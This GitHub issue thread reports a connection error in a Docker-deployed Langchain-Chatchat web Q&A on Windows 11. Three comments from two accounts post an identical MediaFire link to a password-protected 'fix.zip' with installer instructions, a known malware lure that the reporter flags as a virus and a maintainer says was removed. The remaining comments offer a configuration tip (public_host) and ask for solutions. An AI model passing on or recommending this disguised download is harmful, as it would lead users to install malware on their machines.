### ISSUE TITLE
[BUG] 网页问答提示ERRORchatchat.server.api server.openai routes:generator:105 - ror: Connection error.

### ISSUE THREAD

**Issue by npqzxc** [chatchat-space/Langchain-Chatchat#4870]
**问题描述 / Problem Description**
docker部署
windows11机器
image：ccr.ccs.tencentyun.com/langchain-chatchat/chatchat:0.3.1.3-10eb8e9-20240807
8501和9997服务启动正常
网页问答报错

![img_v3_02e4_ae7aa3c7-82fc-4af3-8a5a-fce94c22a7eg](https://github.com/user-attachments/assets/31133132-d483-4749-b513-e348d516c4e6)
![img_v3_02e4_2d441ddb-34eb-4f59-9de7-f995f447ee2g](https://github.com/user-attachments/assets/c1eb0650-1da3-4c5c-ab43-45f732bf9dc5)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by npqzxc** [comment]
小心，上面的是病毒

**Comment by imClumsyPanda** [comment]
@npqzxc 感谢反馈 已删除误导链接

**Comment by liunux4odoo** [comment]
你把 basic_settings.yaml 里面 public_host 改成你云服务实际地址试试

**Comment by ixiami1314** [comment]
难道没人遇到这个问题？

**Comment by chenluckyhh** [comment]
> 难道没人遇到这个问题？

遇到了 你有解决的办法吗
